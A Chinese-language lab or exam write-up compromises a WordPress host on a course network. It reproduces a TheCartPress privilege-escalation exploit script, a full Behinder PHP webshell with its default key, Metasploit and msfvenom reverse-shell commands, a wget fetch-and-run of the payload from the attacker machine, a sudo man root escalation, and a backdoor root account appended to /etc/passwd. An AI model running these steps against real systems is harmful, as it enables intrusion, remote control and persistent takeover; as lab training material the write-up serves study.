接上集

0x01.考试靶场

3. 梳理

  • WordPress:6.5.2

  • Theme:amberd-online-store

  • Plugins:thecartpress

02. 漏洞搜索

1. 使用 Google 搜索插件漏洞

thecartpress exploit

exploit-db 中找到一条漏洞poc

03. 漏洞利用

1. poc

# Exploit Title: Wordpress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated)
# Google Dork: inurl:/wp-content/plugins/thecartpress/
# Date: 04/10/2021
# Exploit Author: spacehen
# Vendor Homepage: https://wordpress.org/plugin/thecartpress
# Version: <= 1.5.3.6
# Tested on: Ubuntu 20.04.1

import os.path
from os import path
import json
import requests;
import sys

def print_banner():
	print("TheCartPress <= 1.5.3.6 - Unauthenticated Privilege Escalation")
	print("Author -> space_hen (www.github.com/spacehen)")
	
def print_usage():
	print("Usage: python3 exploit.py [target url]")
	print("Ex: python3 exploit.py https://example.com")

def vuln_check(uri):
	response = requests.get(uri)
	raw = response.text
	if ("User name is required" in raw):
		return True;
	else:
		return False;

def main():

	print_banner()
	if(len(sys.argv) != 2):
		print_usage();
		sys.exit(1);

	base = sys.argv[1]

	ajax_action = 'tcp_register_and_login_ajax'
	admin = '/wp-admin/admin-ajax.php';

	uri = base + admin + '?action=' + ajax_action ;
	check = vuln_check(uri);

	if(check == False):
		print("(*) Target not vulnerable!");
		sys.exit(1)

	data = {
	"tcp_new_user_name" : "admin_03",
	"tcp_new_user_pass" : "admin1234",
	"tcp_repeat_user_pass" : "admin1234",
	"tcp_new_user_email" : "test@test.com",
	"tcp_role" : "administrator"
	}
	print("Inserting admin...");
	response = requests.post(uri, data=data )
	if (response.text == "\"\""):
		print("Success!")
		print("Now login at /wp-admin/")
	else:
		print(response.text)

main();

2. exploit

  • 修改新建用户名(tcp_new_user_name):admin_03

  • 新建用户密码(tcp_new_user_pass):admin1234

┌──(kali㉿kali)-[~/Desktop]
└─$ python3 rce.py http://cms.comp7904.hku/
TheCartPress <= 1.5.3.6 - Unauthenticated Privilege Escalation
Author -> space_hen (www.github.com/spacehen)
Inserting admin...
Success!
Now login at /wp-admin/

  • 创建用户成功 admin_03/admin123

  • 登录页:http://cms.comp7904.hku/wp-admin/

3. getshell

经测试无法修改主题代码

  • wordpress.org 下载新主题

  • 修改主题代码为 shell 代码

  • http://cms.comp7904.hku/wp-admin/theme-install.php?browse=popular 上传新主题

  • http://cms.comp7904.hku/wp-admin/themes.php 启用新主题

4. 连接WebShell

  • shell:http://cms.comp7904.hku/wp-content/themes/twentytwentyfour/functions.php?cmd=phpinfo();

  • 通过蚁剑(AntSword)连接shell

04. 考试要求

1. 获取根目录第一个Flag

  • /var/www/wordpress/local.txt

  • Flag_local_723be47accY3Z6amlkYW1kbmFq3a519d

0x04 后渗透

00. 主机信息

Server: 10.16.0.134
Kali: 10.16.0.135
Hack-Win: 10.16.0.129

01.反弹MSF(Metasploit Framework)

这里使用冰蝎的反弹模块

1. 设置MSF监听模块

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > msf6 > use exploit/multi/handler
[-] Unknown command: msf6. Run the help command for more details.
msf6 exploit(multi/handler) > [*] Using configured payload generic/shell_reverse_tcp
[-] Unknown command: [*]. Run the help command for more details.
msf6 exploit(multi/handler) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 0.0.0.0:4444

2. 使用冰蝎(Behinder)连接Shell

  • 网站根目录 /var/www/wordpress/ 新建 shell.php 文件,写入冰蝎马

<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
	$_SESSION['k']=$key;
	session_write_close();
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

  • shell:http://cms.comp7904.hku/shell.php

  • Pass:rebeyond

  • 使用shell反弹模块

  • 设置IP地址:kali IPv4

  • 设置端口:4444

3. meterpreter php shell转linux shell

  • kali Linux

msf设置

msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 0.0.0.0:4444

生成elf脚本

┌──(kali㉿kali)-[~/Downloads]
└─$ msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=10.16.0.135 LPORT=4444 -f elf > mshell.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 1068952 bytes
Final size of elf file: 1068952 bytes

开启 http.server

┌──(kali㉿kali)-[~/Downloads]
└─$ python3 -m http.server

在冰蝎中下载 payload

wget http://10.16.0.135:8000/mshell.elf

授予权限并执行

chmod +x ./mshell.elf
./mshell.elf

02. 权限提升

1. 获取TTY shell

python3 -c 'import pty;pty.spawn("/bin/bash")';

msf6 exploit(multi/handler) > sessions 2
[*] Starting interaction with 2...

meterpreter > shell
Process 3024 created.
Channel 61 created.
python3 -c 'import pty;pty.spawn("/bin/bash")';
www-data@comp7904:~/wordpress$ whoami
whoami
www-data

2. 查看能以root权限运行的命令

sudo -l

www-data@comp7904:~/wordpress$ sudo -l
sudo -l
Matching Defaults entries for www-data on comp7904:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User www-data may run the following commands on comp7904:
    (root) NOPASSWD: /usr/bin/man

  • 存在 /usr/bin/man

3. 使用/usr/bin/man提权

sudo man man

www-data@comp7904:~/wordpress$ sudo man man
sudo man man
WARNING: terminal is not fully functional
Press RETURN to continue

输入 enter 继续

MAN(1)                        Manual pager utils                        MAN(1)

NAME
       man - an interface to the system reference manuals

SYNOPSIS
       man [man options] [[section] page ...] ...
       man -k [apropos options] regexp ...
       man -K [man options] [section] term ...
       man -f [whatis options] page ...
       man -l [man options] file ...
       man -w|-W [man options] page ...

DESCRIPTION
       man  is  the system's manual pager.  Each page argument given to man is
       normally the name of a program, utility or function.  The  manual  page
       associated with each of these arguments is then found and displayed.  A
       section, if provided, will direct man to look only in that  section  of
       the  manual.   The  default action is to search in all of the available
       sections following a pre-defined order (see DEFAULTS), and to show only
       the first page found, even if page exists in several sections.

       The table below shows the section numbers of the manual followed by the
 Manual page man(1) line 1 (press h for help or q to quit)h
...skipping...

                   SUMMARY OF LESS COMMANDS

      Commands marked with * may be preceded by a number, N.
      Notes in parentheses indicate the behavior if N is given.
      A key preceded by a caret indicates the Ctrl key; thus ^K is ctrl-K.

  h  H                 Display this help.
  q  :q  Q  :Q  ZZ     Exit.
 ---------------------------------------------------------------------------

                           MOVING

  e  ^E  j  ^N  CR  *  Forward  one line   (or N lines).
  y  ^Y  k  ^K  ^P  *  Backward one line   (or N lines).
  f  ^F  ^V  SPACE  *  Forward  one window (or N lines).
  b  ^B  ESC-v      *  Backward one window (or N lines).
  z                 *  Forward  one window (and set window to N).
  w                 *  Backward one window (and set window to N).
  ESC-SPACE         *  Forward  one window, but don't stop at end-of-file.
  d  ^D             *  Forward  one half-window (and set half-window to N).
  u  ^U             *  Backward one half-window (and set half-window to N).
  ESC-)  RightArrow *  Right one half screen width (or N positions).
  ESC-(  LeftArrow  *  Left  one half screen width (or N positions).
HELP -- Press RETURN for more, or q when done

输入 !/bin/bash 进入base

HELP -- Press RETURN for more, or q when done!/bin/bash
!/bin/bash
root@comp7904:/var/www/wordpress#

查看当前用户

root@comp7904:/var/www/wordpress# whoami
whoami
root

4. 维持root权限

  • 通过向 /etc/passwd 追加内容,添加了一个具有root权限的用户 kali/kali

echo "kali:$(openssl passwd kali):0:0:root:/root:/bin/bash" >> /etc/passwd

5. 获取根目录第二个Flag

  • /root/root.txt

  • Flag_root_608b2llb3dlamtu011e4573a3655fcfc2fee

root@comp7904:/var/www/wordpress# cd /root
cd /root
root@comp7904:~# ls
ls
root.txt  snap
root@comp7904:~# cat root.txt
cat root.txt
Flag_root_608b2llb3dlamtu011e4573a3655fcfc2f